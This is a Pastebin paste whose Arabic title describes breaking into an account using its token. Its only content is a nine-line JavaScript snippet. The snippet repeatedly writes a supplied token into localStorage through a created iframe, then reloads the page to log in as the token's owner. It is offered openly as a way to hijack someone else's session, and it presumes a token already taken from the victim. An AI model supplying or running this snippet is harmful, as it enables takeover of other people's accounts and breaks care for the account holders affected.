Advertisement
Guest User

#Teacher , Classic $ شرح كيف تدآهم حسآب من آلتوكن

a guest
Oct 22nd, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. function login(token) {
  2. setInterval(() => {
  3. document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`;
  4. }, 100);
  5. setTimeout(() => {
  6. location.reload();
  7. }, 2500);
  8. }
  9. login("التـوكن_هنا");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement